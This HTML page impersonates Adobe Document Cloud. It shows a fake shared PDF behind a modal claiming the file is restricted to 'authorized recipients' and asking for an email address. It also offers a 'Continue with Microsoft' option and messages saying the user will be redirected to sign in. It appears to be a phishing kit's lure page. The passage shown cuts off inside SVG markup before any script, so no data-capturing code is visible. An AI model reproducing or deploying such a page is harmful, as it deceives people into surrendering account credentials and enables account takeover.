<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script src="https://cdn.tailwindcss.com"></script>
    <style>
        .progress {
  background: rgba(255,255,255,0.1);
  justify-content: flex-start;
  border-radius: 100px;
  align-items: center;
  position: relative;
  padding: 0 5px;
  display: flex;
  height: 10px;
  width: 150px;
}

.progress-value {
  animation: load 3s normal forwards;
  box-shadow: 0 10px 40px -10px #fff;
  border-radius: 100px;
  background: #2680EB;
  height: 8px;
  width: 0;
}

@keyframes load {
  0% { width: 0; }
  100% { width: 100%; }
}
    </style>
    <title>Adobe Document Cloud</title>
</head>
<body class="bg-[#252525]">
    <div class="flex h-screen w-full bg-black bg-opacity-[50%] fixed items-center justify-center notif px-[30px]" style="z-index: 999; display: none;">
        <div class="bg-white flex flex-col shadow-lg rounded-md max-w-[340px] min-w-[250px] pb-4">
            <div class="login-div rounded-[5px]">
                <div class="bg-[#0D66D0] py-3 px-[17px] border border-[#0D66D0] flex flex-row space-x-2 text-white info-div rounded-t-[5px]">
                    <div class="mt-2 mr-2">
                        <svg width="20" height="19" viewBox="0 0 20 19" fill="none" xmlns="http://www.w3.org/2000/svg">
                            <path d="M14.3508 6.30021H13.5633V4.72516C13.5633 2.55159 11.7992 0.787537 9.62563 0.787537C7.45207 0.787537 5.68801 2.55159 5.68801 4.72516V6.30021H4.90049C4.03421 6.30021 3.32544 7.00898 3.32544 7.87526V15.7505C3.32544 16.6168 4.03421 17.3255 4.90049 17.3255H14.3508C15.2171 17.3255 15.9258 16.6168 15.9258 15.7505V7.87526C15.9258 7.00898 15.2171 6.30021 14.3508 6.30021ZM9.62563 13.3879C8.75936 13.3879 8.05059 12.6792 8.05059 11.8129C8.05059 10.9466 8.75936 10.2378 9.62563 10.2378C10.4919 10.2378 11.2007 10.9466 11.2007 11.8129C11.2007 12.6792 10.4919 13.3879 9.62563 13.3879ZM12.067 6.30021H7.18431V4.72516C7.18431 3.37849 8.27897 2.28383 9.62563 2.28383C10.9723 2.28383 12.067 3.37849 12.067 4.72516V6.30021Z" fill="white"/>
                            </svg>
                            
                    </div>
                    <div class="text-[14px] px-1 max-w-[400px]" style="line-height: 18px;">
                        This file is only available to authorized recipients. Please sign in with an authorized email to view/download.
                    </div>
                </div>
                <div class="px-8 pt-5 pb-4 bg-white rounded-b-[5px]">
                    <div class="email-step" style="display: ;">
                        <div class="text-[24px] mb-3 flex flex-row space-x-2">
                           <div class="selected-provider-logo mt-2"> 
                        </div> 
                            <!-- <div>
                                Sign in
                            </div>  -->
                            <div class="selected-provider"></div>
                        </div>
                        <div class="input-group mt-4 relative">
                            <div class="text-[13px] text-[#747474]">
                                Email address
                            </div>
                            <div class="border border-white border-b-[#2680EB] focus:border-b-[#0D66D0] email-div">
                                <input type="email" class="w-full outline-none py-1" id="email" autofocus>
                            </div>
                            <div class="absolute bottom-10 right-1 email-icon hidden">
                                <svg width="16" height="17" viewBox="0 0 16 17" fill="none" xmlns="http://www.w3.org/2000/svg">
                                    <path d="M8.58939 2.18784C8.35872 1.75184 7.64139 1.75184 7.41072 2.18784L1.41072 13.5212C1.35671 13.6228 1.32993 13.7366 1.333 13.8516C1.33607 13.9666 1.36887 14.0789 1.42822 14.1774C1.48757 14.276 1.57144 14.3575 1.67165 14.414C1.77187 14.4705 1.88501 14.5001 2.00005 14.4998H14.0001C14.115 14.5001 14.2281 14.4705 14.3282 14.414C14.4284 14.3576 14.5122 14.2761 14.5715 14.1776C14.6308 14.0791 14.6635 13.9669 14.6665 13.852C14.6696 13.7371 14.6427 13.6233 14.5887 13.5218L8.58939 2.18784ZM8.66672 12.4998H7.33339V11.1665H8.66672V12.4998ZM7.33339 9.83317V6.49984H8.66672L8.66739 9.83317H7.33339Z" fill="#d7373f"/>
                                    </svg>     
                            </div>
                            <div class="text-[14px] text-[#d7373f] mt-2 email-error hidden">
                                Please enter a valid email address
                            </div>
                        </div>
                        <div class="flex flex-row mt-4 justify-end mb-8 text-[14px]">
                            <div class="">
                                <button type="button" class="next-button inline-flex items-center px-6 py-2 shadow rounded-[100px] text-white bg-[#0D66D0] transition ease-in-out duration-150">
                                    Continue
                                    <svg class="next-loading hidden animate-spin ml-4 mr-1 h-5 w-4 text-white" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24">
                                      <circle class="opacity-25" cx="12" cy="12" r="10" stroke="currentColor" stroke-width="4"></circle>
                                      <path class="opacity-75" fill="currentColor" d="M4 12a8 8 0 018-8V0C5.373 0 0 5.373 0 12h4zm2 5.291A7.962 7.962 0 014 12H0c0 3.042 1.135 5.824 3 7.938l3-2.647z"></path>
                                    </svg>
                                  </button>
                            </div>
                        </div>
                    </div>

                    <div class="not-phal flex flex-col space-y-5" style="display: none;">
                        <div class="flex flex-row">
                            <div class="flex flex-col content-center items-center pt-[3px] back cursor-pointer">
                                <svg width="15" height="15" viewBox="0 0 15 15" fill="none" xmlns="http://www.w3.org/2000/svg">
                                    <path d="M6.707 12.707C6.51947 12.8945 6.26516 12.9998 6 12.9998C5.73484 12.9998 5.48053 12.8945 5.293 12.707L0.793001 8.207C0.60553 8.01947 0.500214 7.76516 0.500214 7.5C0.500214 7.23483 0.60553 6.98053 0.793001 6.793L5.293 2.293C5.4816 2.11084 5.73421 2.01005 5.9964 2.01233C6.2586 2.0146 6.50941 2.11977 6.69482 2.30518C6.88023 2.49059 6.9854 2.7414 6.98767 3.0036C6.98995 3.2658 6.88916 3.5184 6.707 3.707L4 6.5L13.5 6.5C13.7652 6.5 14.0196 6.60536 14.2071 6.79289C14.3946 6.98043 14.5 7.23478 14.5 7.5C14.5 7.76522 14.3946 8.01957 14.2071 8.20711C14.0196 8.39464 13.7652 8.5 13.5 8.5L4 8.5L6.707 11.293C6.89447 11.4805 6.99979 11.7348 6.99979 12C6.99979 12.2652 6.89447 12.5195 6.707 12.707Z" fill="black"/>
                                    </svg>                                    
                            </div>
                            <div class="text-[16px] font-medium w-full text-center email-transfer">
                                john@doe.com
                            </div>
                        </div>
                        <div class="text-[16px] text-[#E71F1F] font-[400] flex flex-row space-x-[11px]">
                            <div class="text-[14px] font-regular">
                                This email address does not have access to this document.
                            </div>
                        </div>
                        <div class="text-[16px] text-[#0D66D0] font-[400] flex flex-row space-x-[11px]">
                            <div class="text-[13px] font-light underline cursor-pointer back">
                                Try another email address
                            </div>
                        </div>
                        <div class="text-[16px] text-[#0D66D0] font-[400] flex flex-row space-x-[11px]">
                            <div class="text-[13px] font-light underline cursor-pointer">
                                <a href="mailto:">Contact sender</a> 
                            </div>
                        </div>
                    </div>
                    <div class="phal flex flex-col space-y-6" style="display: none;">
                        <div class="flex flex-row">
                            <div class="flex flex-col content-center items-center pt-[3px] back cursor-pointer">
                                <svg width="15" height="15" viewBox="0 0 15 15" fill="none" xmlns="http://www.w3.org/2000/svg">
                                    <g clip-path="url(#clip0_4679_1086)">
                                    <g clip-path="url(#clip1_4679_1086)">
                                    <path d="M7.1071 7.22625H0.370117V0.489258H7.1071V7.22625Z" fill="#F1511B"/>
                                    <path d="M14.5459 7.22625H7.80896V0.489258H14.5459V7.22625Z" fill="#80CC28"/>
                                    <path d="M7.10706 14.6652H0.370239V7.92822H7.10706V14.6652Z" fill="#00ADEF"/>
                                    <path d="M14.5459 14.6652H7.80896V7.92822H14.5459V14.6652Z" fill="#FBBC09"/>
                                    </g>
                                    </g>
                                    <defs>
                                    <clipPath id="clip0_4679_1086">
                                    <rect width="15" height="15" fill="white" transform="translate(15 15) rotate(-180)"/>
                                    </clipPath>
                                    <clipPath id="clip1_4679_1086">
                                    <rect width="14.1754" height="14.1754" fill="white" transform="translate(0.370117 0.489258)"/>
                                    </clipPath>
                                    </defs>
                                    </svg>                                                               
                            </div>
                            <div class="text-[16px] font-medium w-full text-center email-transfer">
                                john@doe.com
                            </div>
                        </div>
                        <div class="text-[16px] font-[400] flex flex-row space-x-[11px]">
                            <div class="text-[14px] font-light">
                                This email account is managed by Microsoft.  You will be redirected in a moment.
                            </div>
                        </div>

                        <div class="flex flex-row justify-between">
                            <div>
                                <img src="captcha.svg" alt="">
                            </div>
                            <div class="underline text-[#0D66D0] text-[13px] cursor-pointer">
                                <a href="mailto:">
                                    Report an Error
                                </a>
                            </div>
                        </div>
                    </div>

                    <div class="select-provider" style="display: ;">
                        <div class="flex flex-row my-4 space-x-2 items-center justify-center">
                            <div class="mt-[12px]">
                                <svg width="100" height="1" viewBox="0 0 100 1" fill="none" xmlns="http://www.w3.org/2000/svg">
                                    <line y1="0.75" x2="100" y2="0.75" stroke="black" stroke-opacity="0.4" stroke-width="0.5"/>
                                    </svg>                                
                            </div>
                            <div class="text-[14px] text-center opacity-50 pt-2">
                                OR
                            </div>
                            <div class="mt-[12px]">
                                <svg width="100" height="1" viewBox="0 0 100 1" fill="none" xmlns="http://www.w3.org/2000/svg">
                                    <line y1="0.75" x2="100" y2="0.75" stroke="black" stroke-opacity="0.4" stroke-width="0.5"/>
                                    </svg>                                
                            </div>
                        </div>
                        <div class="flex flex-col items-center space-y-2 text-[12px]">
                            <div class="provider-pill flex flex-row space-x-2 border border-gray-400 rounded-3xl px-3 py-[8px] cursor-pointer text-black w-[220px] justify-center hover:bg-[#0D66D0] hover:text-white">
                                <div class="provider-pill flex flex-row space-x-2">
                                    <div class="logo">
                                        <svg width="15" height="15" viewBox="0 0 15 15" fill="none" xmlns="http://www.w3.org/2000/svg">
                                            <g clip-path="url(#clip0_4556_811)">
                                            <path d="M7.1071 7.40746H0.370117V0.670471H7.1071V7.40746Z" fill="#F1511B"/>
                                            <path d="M14.5459 7.40755H7.80896V0.670563H14.5459V7.40755Z" fill="#80CC28"/>
                                            <path d="M7.10706 14.8464H0.370239V8.10938H7.10706V14.8464Z" fill="#00ADEF"/>
                                            <path d="M14.5459 14.8464H7.80896V8.10938H14.5459V14.8464Z" fill="#FBBC09"/>
                                            </g>
                                            <defs>
                                            <clipPath id="clip0_4556_811">
                                            <rect width="14.1754" height="14.1754" fill="white" transform="translate(0.370117 0.670471)"/>
                                            </clipPath>
                                            </defs>
                                            </svg>
                                            
                                    </div>
                                    <div>
                                        Continue with Microsoft
                                    </div>
                                </div>
                            </div>
                            &nbsp;
                        </div>
                    </div>
                    
                    <div class="captcha-error flex flex-row space-x-2 mt-5" style="display: none;">
                        <div class="">
                            <svg width="16" height="17" viewBox="0 0 16 17" fill="none" xmlns="http://www.w3.org/2000/svg">
                                <path d="M8.58939 2.18784C8.35872 1.75184 7.64139 1.75184 7.41072 2.18784L1.41072 13.5212C1.35671 13.6228 1.32993 13.7366 1.333 13.8516C1.33607 13.9666 1.36887 14.0789 1.42822 14.1774C1.48757 14.276 1.57144 14.3575 1.67165 14.414C1.77187 14.4705 1.88501 14.5001 2.00005 14.4998H14.0001C14.115 14.5001 14.2281 14.4705 14.3282 14.414C14.4284 14.3576 14.5122 14.2761 14.5715 14.1776C14.6308 14.0791 14.6635 13.9669 14.6665 13.852C14.6696 13.7371 14.6427 13.6233 14.5887 13.5218L8.58939 2.18784ZM8.66672 12.4998H7.33339V11.1665H8.66672V12.4998ZM7.33339 9.83317V6.49984H8.66672L8.66739 9.83317H7.33339Z" fill="#d7373f"/>
                                </svg>     
                        </div>
                        <div class="text-center text-[12px] font-light text-[#d7373f]">
                            Captcha Error: Missing site-key value
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="flex flex-row bg-[#323232] px-5 py-[10px]">
        <div class="logo-container py-[3px]">
            <svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
                <g clip-path="url(#clip0_4538_170)">
                <path d="M4.24284 0H19.7571C22.1143 0 24 1.88569 24 4.24284V19.7572C24 22.1143 22.1143 24 19.7571 24H4.24284C1.88569 24 0 22.1143 0 19.7572V4.24284C0 1.88569 1.88569 0 4.24284 0Z" fill="#B30B00"/>
                <path d="M19.1386 13.8429C18.0242 12.6858 14.9814 13.1572 14.2529 13.2429C13.1815 12.2143 12.453 10.9715 12.1958 10.5429C12.5815 9.38576 12.8385 8.22861 12.8815 6.98586C12.8815 5.91439 12.4529 4.75732 11.2529 4.75732C10.8243 4.75732 10.4385 5.01439 10.2242 5.35723C9.71001 6.25732 9.92423 8.05732 10.7385 9.90017C10.2672 11.2287 9.83854 12.5144 8.63854 14.7859C7.3957 15.3 4.78139 16.5001 4.56707 17.7859C4.48139 18.1715 4.60992 18.5573 4.90992 18.8572C5.20992 19.1144 5.59561 19.2429 5.98139 19.2429C7.56707 19.2429 9.10992 17.0573 10.1814 15.2143C11.0814 14.9144 12.4957 14.4858 13.91 14.2286C15.5814 15.6858 17.0385 15.9 17.81 15.9C18.8385 15.9 19.2243 15.4715 19.3529 15.0857C19.5671 14.6572 19.4385 14.1858 19.1386 13.8429V13.8429ZM18.0671 14.5715C18.0242 14.8715 17.6386 15.1715 16.9529 15.0001C16.1385 14.7859 15.41 14.4001 14.7672 13.8858C15.3243 13.8 16.5671 13.6715 17.4672 13.8429C17.81 13.9286 18.1529 14.1429 18.0671 14.5715V14.5715ZM10.91 5.74292C10.9957 5.61439 11.1243 5.5287 11.2529 5.5287C11.6385 5.5287 11.7242 6.00007 11.7242 6.38586C11.6814 7.28595 11.5099 8.18586 11.21 9.04301C10.5671 7.3287 10.6957 6.12861 10.91 5.74292V5.74292ZM10.8243 14.0572C11.1672 13.3715 11.6386 12.1715 11.81 11.6571C12.1957 12.2999 12.8385 13.0715 13.1815 13.4143C13.1815 13.4572 11.8529 13.7143 10.8243 14.0572ZM8.2957 15.7715C7.31001 17.4001 6.28139 18.4286 5.72423 18.4286C5.63854 18.4286 5.55276 18.3858 5.46707 18.3429C5.33845 18.2571 5.29561 18.1286 5.33845 17.9572C5.46707 17.3572 6.58139 16.5429 8.2957 15.7715V15.7715Z" fill="white"/>
                </g>
                <defs>
                <clipPath id="clip0_4538_170">
                <rect width="24" height="24" fill="white"/>
                </clipPath>
                </defs>
            </svg>           
        </div>
        <div class="flex flex-row ml-10 py-[5px] items-center content-center">
            <div>
                <svg width="18" height="18" viewBox="0 0 18 18" fill="none" xmlns="http://www.w3.org/2000/svg">
                    <g clip-path="url(#clip0_4538_177)">
                    <path d="M2.87403 14.3345C1.22413 14.2471 0.100098 12.9482 0.100098 11.1753C0.100098 9.81788 0.834478 8.72657 1.90869 8.34034C1.80273 7.313 2.06543 6.34718 2.67676 5.56007C3.375 4.66163 4.47559 4.12257 5.54492 4.14698H5.54736C5.70361 4.14698 5.8623 4.15675 6.02197 4.17579C6.70312 2.49073 8.27002 1.40186 10.1855 1.34132C11.4155 1.25636 12.8008 1.78077 13.6094 2.63185C14.5166 3.58693 14.9722 4.69533 14.9272 5.8379C14.9272 5.86915 14.9263 5.90528 14.9248 5.94532C16.6816 6.23096 17.9194 7.96729 17.9194 10.231C17.9194 12.6123 16.3535 14.2998 14.1113 14.3345H2.87403ZM2.78565 9.68946C2.19629 9.68946 1.6001 10.1997 1.6001 11.1753C1.6001 11.9438 1.94531 12.7837 2.91406 12.8355L14.0996 12.8345C15.2153 12.8169 16.4194 12.124 16.4194 10.231C16.4194 8.61573 15.624 7.4541 14.4849 7.40576C14.3418 7.3999 14.2349 7.39795 14.1641 7.40332L13.229 7.48437L13.3564 6.55419C13.4023 6.21923 13.4277 5.97021 13.4277 5.8081C13.4575 5.04003 13.1523 4.3291 12.522 3.66503C12.0185 3.13476 11.0684 2.78417 10.2573 2.83935C8.73877 2.88769 7.59912 3.79931 7.25927 5.21923L7.07421 5.9912L6.31396 5.76268C6.04443 5.68211 5.76855 5.64793 5.48242 5.64647C4.87402 5.64647 4.26318 5.96288 3.86133 6.47997C3.39258 7.08397 3.26709 7.88476 3.50733 8.73534L3.77686 9.68944L2.78565 9.68946Z" fill="white" fill-opacity="0.8"/>
                    <path d="M2.87403 14.3345C1.22413 14.2471 0.100098 12.9482 0.100098 11.1753C0.100098 9.81788 0.834478 8.72657 1.90869 8.34034C1.80273 7.313 2.06543 6.34718 2.67676 5.56007C3.375 4.66163 4.47559 4.12257 5.54492 4.14698H5.54736C5.70361 4.14698 5.8623 4.15675 6.02197 4.17579C6.70312 2.49073 8.27002 1.40186 10.1855 1.34132C11.4155 1.25636 12.8008 1.78077 13.6094 2.63185C14.5166 3.58693 14.9722 4.69533 14.9272 5.8379C14.9272 5.86915 14.9263 5.90528 14.9248 5.94532C16.6816 6.23096 17.9194 7.96729 17.9194 10.231C17.9194 12.6123 16.3535 14.2998 14.1113 14.3345H2.87403ZM2.78565 9.68946C2.19629 9.68946 1.6001 10.1997 1.6001 11.1753C1.6001 11.9438 1.94531 12.7837 2.91406 12.8355L14.0996 12.8345C15.2153 12.8169 16.4194 12.124 16.4194 10.231C16.4194 8.61573 15.624 7.4541 14.4849 7.40576C14.3418 7.3999 14.2349 7.39795 14.1641 7.40332L13.229 7.48437L13.3564 6.55419C13.4023 6.21923 13.4277 5.97021 13.4277 5.8081C13.4575 5.04003 13.1523 4.3291 12.522 3.66503C12.0185 3.13476 11.0684 2.78417 10.2573 2.83935C8.73877 2.88769 7.59912 3.79931 7.25927 5.21923L7.07421 5.9912L6.31396 5.76268C6.04443 5.68211 5.76855 5.64793 5.48242 5.64647C4.87402 5.64647 4.26318 5.96288 3.86133 6.47997C3.39258 7.08397 3.26709 7.88476 3.50733 8.73534L3.77686 9.68944L2.78565 9.68946Z" fill="white" fill-opacity="0.8"/>
                    </g>
                    <defs>
                    <clipPath id="clip0_4538_177">
                    <rect width="18" height="18" fill="white"/>
                    </clipPath>
                    </defs>
                    </svg>                    
            </div>
            <div class="flex flex-row space-x-2 ml-5 text-[12px]">
                <div class="text-[#C8C8C8]">
                    Shared
                </div>
                <div class="text-[#808080]">
                    /
                </div>
                <div class="text-white text-ellipsis truncate overflow-hidden max-w-[100px]">
                    Plans for Renovation of 2 bed
                </div>
                <div class="text-[#C8C8C8]">
                    PDF
                </div>
                <div>
                    <svg width="18" height="18" viewBox="0 0 18 18" fill="none" xmlns="http://www.w3.org/2000/svg">
                        <path d="M8.99991 11.5C9.09848 11.5002 9.19611 11.4808 9.28717 11.443C9.37823 11.4053 9.46092 11.3499 9.53049 11.28C10.1365 10.7028 11.4999 9.24217 12.7699 8.04061C12.9105 7.89997 12.9896 7.70922 12.9896 7.51032C12.9896 7.31142 12.9105 7.12067 12.7699 6.98003C12.6293 6.83939 12.4385 6.76038 12.2396 6.76038C12.0407 6.76038 11.85 6.83939 11.7093 6.98003L8.99991 9.68948L6.29049 6.98003C6.14985 6.83939 5.95909 6.76038 5.7602 6.76038C5.5613 6.76038 5.37055 6.83939 5.22991 6.98003C5.08927 7.12067 5.01025 7.31142 5.01025 7.51032C5.01025 7.70922 5.08927 7.89997 5.22991 8.04061L8.46933 11.28C8.53889 11.3499 8.62158 11.4053 8.71264 11.443C8.8037 11.4808 8.90133 11.5002 8.99991 11.5Z" fill="white"/>
                    </svg>                        
                </div>
            </div>
        </div>
    </div>

    <div class="fixed left-[12px] toolbar-side">
        <div class="flex flex-col items-center justify-center h-[86vh]">
            <svg width="48" height="248" viewBox="0 0 48 248" fill="none" xmlns="http://www.w3.org/2000/svg">
                <rect width="48" height="248" rx="5" fill="#252525"/>
                <rect x="8" y="8" width="32" height="32" rx="2" fill="#2680EB"/>
                <path fill-rule="evenodd" clip-rule="evenodd" d="M28.6533 24.3087L20.7205 16.6913C20.3245 16.311 20.0005 16.4491 20.0005 16.9981V28.488C20.0005 29.0332 20.3024 29.1509 20.6714 28.7495L23.1946 25.8581L25.5592 30.7365C25.6171 30.8558 25.72 30.9473 25.8452 30.9908C25.9705 31.0342 26.1079 31.0262 26.2272 30.9683L27.1262 30.5325C27.2456 30.4747 27.337 30.3718 27.3805 30.2465C27.424 30.1213 27.4159 29.9838 27.358 29.8645L25 25H28.3752C28.9241 25 29.0493 24.6889 28.6533 24.3087Z" fill="white"/>
                <path d="M37.7492 32C37.7162 31.9999 37.6836 32.0064 37.6531 32.0189C37.6226 32.0315 37.5949 32.05 37.5716 32.0732L32.0737 37.5716C32.0385 37.6067 32.0146 37.6514 32.0048 37.7001C31.9951 37.7488 32.0001 37.7993 32.0191 37.8452C32.0381 37.8911 32.0704 37.9303 32.1117 37.9579C32.153 37.9854 32.2016 38.0001 32.2513 38H37.7492C37.8157 38 37.8795 37.9736 37.9265 37.9265C37.9736 37.8795 38 37.8157 38 37.7492V32.2508C38 32.1843 37.9736 32.1205 37.9265 32.0735C37.8795 32.0264 37.8157 32 37.7492 32Z" fill="white"/>
                <path d="M30.0883 71.75H24.0121C20.1635 71.75 16.4267 68.7022 15.8519 65.0938C15.4457 62.541 16.2567 60.0352 18.0766 58.2158C19.9174 56.376 22.4657 55.5586 25.0678 55.9746C28.8773 56.583 31.7499 60.0527 31.7499 64.0459V70.0889C31.7499 71.0049 31.0043 71.75 30.0883 71.75ZM23.7465 57.3682C22.015 57.3682 20.3778 58.0371 19.1366 59.2774C17.661 60.752 17.0038 62.7861 17.3334 64.8574C17.7909 67.7305 20.912 70.25 24.0121 70.25H30.0883C30.1757 70.25 30.2499 70.1758 30.2499 70.0889V64.0459C30.2499 60.7822 27.9203 57.9492 24.8314 57.4551C24.4677 57.3975 24.1049 57.3682 23.7465 57.3682ZM27.9999 62.25V61.75C27.9999 61.4739 27.776 61.25 27.4999 61.25H20.4999C20.2238 61.25 19.9999 61.4739 19.9999 61.75V62.25C19.9999 62.5262 20.2238 62.75 20.4999 62.75H27.4999C27.776 62.75 27.9999 62.5262 27.9999 62.25ZM25.9999 65.25V64.75C25.9999 64.4739 25.776 64.25 25.4999 64.25H20.4999C20.2238 64.25 19.9999 64.4739 19.9999 64.75V65.25C19.9999 65.5262 20.2238 65.75 20.4999 65.75H25.4999C25.776 65.75 25.9999 65.5262 25.9999 65.25Z" fill="#B9B9B9"/>
                <path d="M37.7492 72C37.7162 71.9999 37.6836 72.0064 37.6531 72.0189C37.6226 72.0315 37.5949 72.05 37.5716 72.0732L32.0737 77.5716C32.0385 77.6067 32.0146 77.6514 32.0048 77.7001C31.9951 77.7488 32.0001 77.7993 32.0191 77.8452C32.0381 77.8911 32.0704 77.9303 32.1117 77.9579C32.153 77.9854 32.2016 78.0001 32.2513 78H37.7492C37.8157 78 37.8795 77.9736 37.9265 77.9265C37.9736 77.8795 38 77.8157 38 77.7492V72.2508C38 72.1843 37.9736 72.1205 37.9265 72.0735C37.8795 72.0264 37.8157 72 37.7492 72Z" fill="#B9B9B9"/>
                <path opacity="0.5" d="M26 107.401H32.5L29 110.901H22.3L26 107.401Z" fill="#B9B9B9"/>
                <path d="M17.3001 107.201L15.8001 109.501C15.3001 110.201 15.7001 110.901 16.4001 110.901H20.1001C20.263 110.901 20.4229 110.857 20.5617 110.772C20.7006 110.686 20.8128 110.564 20.8856 110.418C20.9585 110.273 20.9891 110.109 20.974 109.947C20.9588 109.785 20.8986 109.63 20.8001 109.501L18.6001 107.201C18.52 107.106 18.4204 107.03 18.3082 106.979C18.1959 106.927 18.0737 106.9 17.9501 106.9C17.8264 106.9 17.7042 106.927 17.5919 106.979C17.4797 107.03 17.3801 107.106 17.3001 107.201Z" fill="#B9B9B9"/>
                <path d="M22.3633 108.79C22.1909 108.777 22.0229 108.73 21.8693 108.651C21.7156 108.572 21.5794 108.463 21.4687 108.33L19.3701 106.231C19.2427 106.116 19.1392 105.977 19.0655 105.823C18.9917 105.668 18.9493 105.5 18.9404 105.329C18.9414 105.187 18.9712 105.046 19.0279 104.916C19.0847 104.785 19.1672 104.668 19.2705 104.57L28.4697 95.3702C28.6982 95.1367 29.0101 95.0036 29.3368 95.0001C29.6635 94.9965 29.9782 95.1229 30.2117 95.3514L30.2305 95.3702L32.3301 97.4703C32.5634 97.6987 32.6965 98.0103 32.7001 98.3368C32.7036 98.6632 32.5774 98.9777 32.3491 99.2111L32.3291 99.2311L23.1299 108.431C23.0329 108.539 22.915 108.627 22.7832 108.689C22.6515 108.75 22.5087 108.785 22.3633 108.79ZM20.6123 105.348L22.3496 107.089L31.0889 98.3502L29.3496 96.611L20.6123 105.348Z" fill="#B9B9B9"/>
                <path d="M37.7492 112C37.7162 112 37.6836 112.006 37.6531 112.019C37.6226 112.032 37.5949 112.05 37.5716 112.073L32.0737 117.572C32.0385 117.607 32.0146 117.651 32.0048 117.7C31.9951 117.749 32.0001 117.799 32.0191 117.845C32.0381 117.891 32.0704 117.93 32.1117 117.958C32.153 117.985 32.2016 118 32.2513 118H37.7492C37.8157 118 37.8795 117.974 37.9265 117.927C37.9736 117.879 38 117.816 38 117.749V112.251C38 112.184 37.9736 112.121 37.9265 112.073C37.8795 112.026 37.8157 112 37.7492 112Z" fill="#B9B9B9"/>
                <path d="M24.8135 150.013C19.0574 150.013 15.7334 147.102 15.512 144.253C15.3211 141.8 17.3797 138.908 23.727 138.145C27.775 137.661 30.7439 138.398 31.8811 140.172C32.1701 140.617 32.323 141.136 32.3211 141.666C32.3191 142.195 32.1623 142.713 31.8701 143.155C31.015 144.551 28.7555 145.906 24.9465 145.65C24.8838 145.645 24.8227 145.628 24.7667 145.6C24.7107 145.571 24.6608 145.532 24.6199 145.484C24.5791 145.436 24.548 145.381 24.5286 145.321C24.5091 145.261 24.5016 145.198 24.5065 145.135L24.5072 145.128L24.554 144.658C24.568 144.535 24.6289 144.423 24.7239 144.345C24.8189 144.267 24.9406 144.228 25.0633 144.238C28.2396 144.444 30.0553 143.406 30.6628 142.415C30.813 142.199 30.8956 141.943 30.9002 141.68C30.9048 141.417 30.8311 141.158 30.6886 140.937C30.055 139.949 27.9364 139.066 23.8967 139.552C19.4853 140.082 16.7488 141.884 16.9241 144.143C17.1048 146.469 20.2997 148.757 25.3881 148.586C26.1116 148.571 26.8334 148.508 27.5489 148.4C27.6676 148.377 27.7907 148.399 27.8931 148.464C27.9955 148.528 28.0695 148.629 28.1 148.746L28.2151 149.205C28.2469 149.325 28.2297 149.453 28.1673 149.56C28.1048 149.668 28.0023 149.746 27.8821 149.778L27.8557 149.784C27.0557 149.912 26.2478 149.985 25.4379 150.002C25.2267 150.009 25.0192 150.013 24.8135 150.013Z" fill="#B9B9B9"/>
                <path d="M22.3897 184.964L21.6465 187.191C21.6376 187.224 21.6182 187.252 21.5912 187.271C21.5642 187.291 21.5314 187.301 21.4981 187.3H20.1485C20.0762 187.3 20.045 187.255 20.0547 187.165L22.835 179.254C22.8638 179.175 22.8863 179.093 22.9024 179.011C22.92 178.921 22.9386 178.759 22.9571 178.524C22.9571 178.462 22.9835 178.431 23.0372 178.431H24.9141C24.9256 178.429 24.9373 178.431 24.9484 178.434C24.9595 178.438 24.9697 178.443 24.9785 178.451C24.9873 178.459 24.9944 178.468 24.9994 178.478C25.0045 178.489 25.0074 178.5 25.0078 178.512L28.127 187.179C28.1358 187.26 28.1094 187.3 28.0459 187.3H26.5342C26.5061 187.301 26.4781 187.295 26.4539 187.28C26.4297 187.266 26.4104 187.244 26.3985 187.219L25.6162 184.964L22.3897 184.964ZM25.1836 183.493C25.1114 183.268 24.3604 180.964 24.252 180.631C24.1446 180.298 24.0586 180.015 23.9961 179.78H23.9825C23.9287 180.006 23.8565 180.269 23.7666 180.57C23.6758 180.872 22.92 183.186 22.8213 183.493L25.1836 183.493Z" fill="#B9B9B9"/>
                <path d="M17.5 175H15V176.5H17.5V175Z" fill="#B9B9B9"/>
                <path d="M21.5 175H19V176.5H21.5V175Z" fill="#B9B9B9"/>
                <path d="M17.5 190H15V191.5H17.5V190Z" fill="#B9B9B9"/>
                <path d="M25.5 175H23V176.5H25.5V175Z" fill="#B9B9B9"/>
                <path d="M29.5 175H27V176.5H29.5V175Z" fill="#B9B9B9"/>
                <path d="M33 175H31V176.5H33V175Z" fill="#B9B9B9"/>
                <path d="M21.5 190H19V191.5H21.5V190Z" fill="#B9B9B9"/>
                <path d="M25.5 190H23V191.5H25.5V190Z" fill="#B9B9B9"/>
                <path d="M29.5 190H27V191.5H29.5V190Z" fill="#B9B9B9"/>
                <path d="M33 190H31V191.5H33V190Z" fill="#B9B9B9"/>
                <path d="M16.5 178H15V180.5H16.5V178Z" fill="#B9B9B9"/>
                <path d="M16.5 182H15V184.5H16.5V182Z" fill="#B9B9B9"/>
                <path d="M16.5 186H15V188.5H16.5V186Z" fill="#B9B9B9"/>
                <path d="M33 178H31.5V180.5H33V178Z" fill="#B9B9B9"/>
                <path d="M33 182H31.5V184.5H33V182Z" fill="#B9B9B9"/>
                <path d="M33 186H31.5V188.5H33V186Z" fill="#B9B9B9"/>
                <path d="M37.7492 192C37.7162 192 37.6836 192.006 37.6531 192.019C37.6226 192.032 37.5949 192.05 37.5716 192.073L32.0737 197.572C32.0385 197.607 32.0146 197.651 32.0048 197.7C31.9951 197.749 32.0001 197.799 32.0191 197.845C32.0381 197.891 32.0704 197.93 32.1117 197.958C32.153 197.985 32.2016 198 32.2513 198H37.7492C37.8157 198 37.8795 197.974 37.9265 197.927C37.9736 197.879 38 197.816 38 197.749V192.251C38 192.184 37.9736 192.121 37.9265 192.073C37.8795 192.026 37.8157 192 37.7492 192Z" fill="#B9B9B9"/>
                <g clip-path="url(#clip0_4551_573)">
